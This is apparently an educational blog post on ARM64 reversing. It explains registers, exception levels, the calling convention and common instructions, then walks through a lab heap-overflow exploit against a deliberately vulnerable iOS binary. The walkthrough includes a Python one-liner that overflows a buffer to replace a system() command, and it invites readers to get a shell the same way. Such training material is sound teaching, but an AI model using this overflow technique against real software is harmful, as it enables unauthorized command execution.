ARM64 Reversing and Exploitation Part 1 - ARM Instruction Set + Simple Heap Overflow
Hi Everyone ! In this blog series, we will be understanding the ARM instruction set and using that to reverse ARM Binaries followed by writing exploits for them. So let’s start with the basics of ARM64.
ARM64 is a family of RISC (reduced instruction set computer) architecture. The distinguishing factor of a RISC architecture is the use of a small, highly-optimized set of instructions, rather than the more specialized set often found in other types of architecture (for e.g CISC). ARM64 follows the Load/Store approach, in which both operands and destination must be in registers. The load–store architecture is an instruction set architecture that divides instructions into two category: memory access (load and store between memory and registers), and ALU operations (which only occur between registers). This differs from a register–memory architecture (for example, a CISC instruction set architecture such as x86) in which one of the operands for the ADD operation may be in memory, while the other is in a register. Using ARM architecture is ideal for mobile devices, since the RISC architecture requires few transistors, and hence leads to less power consumption and heating of the device, thereby leading to a better battery life which is essential for mobile devices.
Both the current iOS and Android phones use ARM processors, and the newer ones use ARM64 in specific. Reversing ARM64 assembly code is therefore vital to understanding the internal workings of a binary or any binary/app. It is impossible to cover the whole ARM64 instruction set in this blog series and hence we will be focusing on the most useful instructions and the most commonly used registers. It is also important to note that ARM64 is also referred as ARMv8 (8.1, 8.3 etc) while ARM32 is ARMv7(s).
ARMv8 (ARM64) maintains compatibility with existing 32-bit architecture by using two execution states - Aarch32 and Aarch64. In Aarch32 state, the processor can only access 32-bit registers. In Aarch64 state, the processor can access 32-bit and 64-bit registers. ARM64 several general-purpose and special-purpose registers. The general-purpose registers are those which do not have side effects, and hence can be used by most instructions. One can do arithmetic with them, use them for memory addresses, and so on. The special purpose registers also do not have side effect, but can only be used for certain purposes and only by certain instructions. Other instructions may depend on their values implicitly. One example for this is the Stack Pointer register. And then we have Control-registers - these registers have side effects. On an ARM64 these are registers like TTBR (Translation table base register), which holds the base pointer of the current page tables. Many of these will be privileged and can only be used by kernel code. Some Control registers however can be used by anyone. In the below image we can see some control registers from the XNU Kernel.
Example of some control registers used in the iOS kernel
The modern OS expects to have several privilege levels which it can use to control access to resources. An example of this is the split between the kernel and the userland. Armv8 enables this split by implementing different levels of privilege, which are referred to as Exception levels in the Armv8-A architecture. ARMv8 has several exception levels that are numbered (EL0, EL1 etc), the higher the number the higher the privilege. When taking an exception, the exception level can either increase or remain the same. However, when returning from an exception, the exception level can either decrease or remain the same. Execution state (Aarch32 or Aarch64) can change by taking or returning from an exception. On powerup, the device enters the highest exception level.
In terms of privilege EL0 < EL1 < EL2 < EL3
Example of Exception levels in ARM
The following list defines the different ARM64 registers and their purpose
- x0-x30 are 64-bit general purpose registers. Their bottom halves can be accessed via w0-w30.
- There are four stack pointer registers SP\_EL0, SP\_EL1, SP\_EL2, SP\_EL3 (each for different execution levels) which are 32-bit wide. Apart from that there are three exception link registers ELR\_EL1, ELR\_EL2, ELR\_EL3, three saved program status registers SPSR\_EL1, SPSR\_EL2, SPSR\_EL3, and one Program Counter registers (PC).
- Arm also uses PC Relative addressing - wherein it specifies the operand address relative to the PC (base address) - This helps in giving out Position independent code.
- In ARM64 (unlike ARM32), the PC cannot be accessed by most instructions, especially not directly. The PC is modified indirectly using jump or stack-related instructions.
- Similarly, the SP (Stack pointer) register is never modified implicitly (for e.g. using push/pop calls).
- The Current Program Status Register (CPSR) holds the same program status flags as the APSR along with some additional information.
- First register in opcode is usually destination, rest are source (except for str, stp)
|x0 -x7||Arguments (up to 8) - Rest on stack|
|x8 -x18||General purpose, hold variables. No assumptions can be made upon returning from a function|
|x19 -x28||If used by a function, must have their values preserved and later restored upon returning to the caller|
|x29 (fp)||Frame Pointer (points to bottom of frame)|
|x30 (lr)||Link Register. Holds the return address of a call|
|x16||Holds the system call # in (SVC 0x80) call|
|x31 (sp/(x/w)zr)||Stack Pointer (sp) or zero register(xzr or wzr)|
|PC||Program Counter Register. Contains the address of the next instruction to be executed|
|APSR / CPSR||Current Program status register (holds flags)|
ARM64 calling convention
- Arguments are passed in x0-x7 registers, rest are passed on the stack
- ret command is used to return to address in Link register (default value is x30)
- Return value of the function is stored in x0 or x0+x1 depending if its 64-bit or 128-bit
- x8 is the indirect result register, used to pass the address location of an indirect result, for example, where a function returns a large structure
- Branch to a function happens using the B opcode.
- Branch with link (BL) copies the address of the next instruction (after the BL) into the link register (x30) before branching
- BL is hence used for subroutine calls
- BR call is used to branch to register, for e.g br x8
- BLR code is used to branch to register and store the address of the next instruction (after the BL) into the link register (x30)
|MOV||Move one register to another|
|MOVN||Move negative value to register|
|MOVK||Move 16-bits into register and leave the rest unchanged|
|MOVZ||Move shifted 16-bit registers, leaving the rest unchanged|
|lsl/lsr||Logical shift left, Logical shift right|
|ldp/stp||load/store two registers behind each other|
|adr||Address of label at PC-relative offset|
|adrp||Address of page at PC-relative offset|
|cmp||Compare two values, flags are updated automatically (N - result bit 31, Z if result zero, V if overflow, C if NOT borrow)|
|bne||Branch if zero flag is not set|
Apart from this, there might be some system specific registers as well, which are available only on that particular OS. For e.g, the below registers are present in iOS
Reading/Writing System Registers
For e.g use MSR PAN, #1 to set the PAN bit and MSR PAN, #0 to clear the PAN bit
Prologue - Appears at the start of the function, prepares the stack and registers for use within the function</li>
Epilogue - Appears at the end of the function, restores the stack and registers to the original state before function call</li>
- mov x0, x1 -> x0 = x1
- movn x0, 1 -> x0 = -1
- add x0, x1 -> x0 = x0 + x1
- ldr x0, [x1] -> x0 = *x1 -> x0 = address stored in x1
- ldr x0, [x1, 0x10]! -> x1 += 0x10; x0 = *x1(Pre-Indexing mode)
- ldr x0, [x1], 0x10 -> x0 = *x1; x1 += 0x10 (Post-Indexing mode)
- str x0, [x1] -> *x1 = x0 -> Destination is on the right
- ldr x0, [x1, 0x10] -> x0 = *(x1 + 0x10)
- ldrb w0, [x1] -> Load a byte from address stored in x1
- ldrsb w0, [x1] -> Load a signed byte from address stored in x1
- adr x0, label -> Load address of labels into x0
- stp x0, x1, [x2] -> *x2 = x0; *(x2 + 8) = x1
- stp x29, x30, [sp, -64]! -> store x29, x30 (LR) on stack
- ldp x29, x30, [sp], 64] -> Restore x29, x30 (LR) from the stack
- svc 0 -> Perform a syscall (syscall number x16 register)
- str x0, [x29] -> store x0 at the address in x29 (destination on right)
- ldr x0, [x29] -> load the value from the address in x29 into x0
- blr x0 -> calls the subroutine at the address stored in x0, store next instruction in link register (x30)
- br x0 -> Jump to address stored in x0
- bl label -> Branch to label, store next instruction in link register (x30)
- bl printf -> Call the printf function with arguments stored x0, x1
- ret -> Jump to the address stored in x30
A Simple Heap Overflow
Let’s write a simple Heap overflow exploit for an ARM binary.
Your task is to exploit a heap overflow vulnerability in the vuln binary to execute a command of your choice. The binaries are compiled for the iOS platform so need to be run on a jailbroken iOS device.
The binaries for this and the next article can be found here
SSH to your Corellium (or jailbroken iOS) device and run the vuln binary
Run the binary vuln. You get a message that says “Better luck next time”
Let’s open the binary in Hopper to see what’s going on. Let’s have a look at the main function.
So, it’s clear what we need to do to jump to the function heapOverflow
In order to do that, the following requirements must be met
- Pass three arguments (or 2 because the first argument in a C program is the command with which the program is invoked)
- argv should be the string “heap”
- argv should be some argument that gets passed as the first argument to the function heapOverflow
Just to recall
A main function in C has the prototype
int main(int argc, char **argv)
argc - An integer that contains the count of arguments that follow in argv. The argc parameter is always greater than or equal to 1.
argv - An array of null-terminated strings representing command-line arguments entered by the user of the program. By convention, argv is the command with which the program is invoked, argv is the first command-line argument, and so on, until argv[argc], which is always NULL
Let’s also have a look at the PseudoCode of the heapOverflow function. Note that the PseudoCode shows up for 32-bit arch but still gives you a good idea of the program flow.
So it seems like it tries to open a file with the name as the first argument which is passed to it.
At the end, there is also a call to the system function which executes a command, the input is the r22 (or x22) register
The allocation for r21 (x21) is 0x400 bytes, which is read using the following fread command
fread(r21, 0x1, r20, r19);
Let’s create a simple file on the device and pass it as input to the vuln binary.
echo “Hello World” > input.txt ./vuln heap input.txt
So it seems like it prints out the input for the whoami command
Let’s cheat a bit to look at the Source code itself
Sure enough, passing a file with length more than 0x400 bytes will overflow the adjacent memory and might end up overflowing the string “command”, and thus when the system call is made, we might be able to call our own commands.
On the Corellium device, use the following command to generate the malicious file
python3 -c ‘print(“/”*0x400+”/bin/ls\x00”)’ > hax.txt
Then pass it as input to the binary.
vuln heap hax.txt
Instead of the whoami command, the ls command gets executed.
Can you try and get a shell on the device using this ?
- https://developer.arm.com/documentation/ddi0487/latest/arm-architecture-reference-manual-armv8-for-armv8-a-architecture-profile https://exploit.education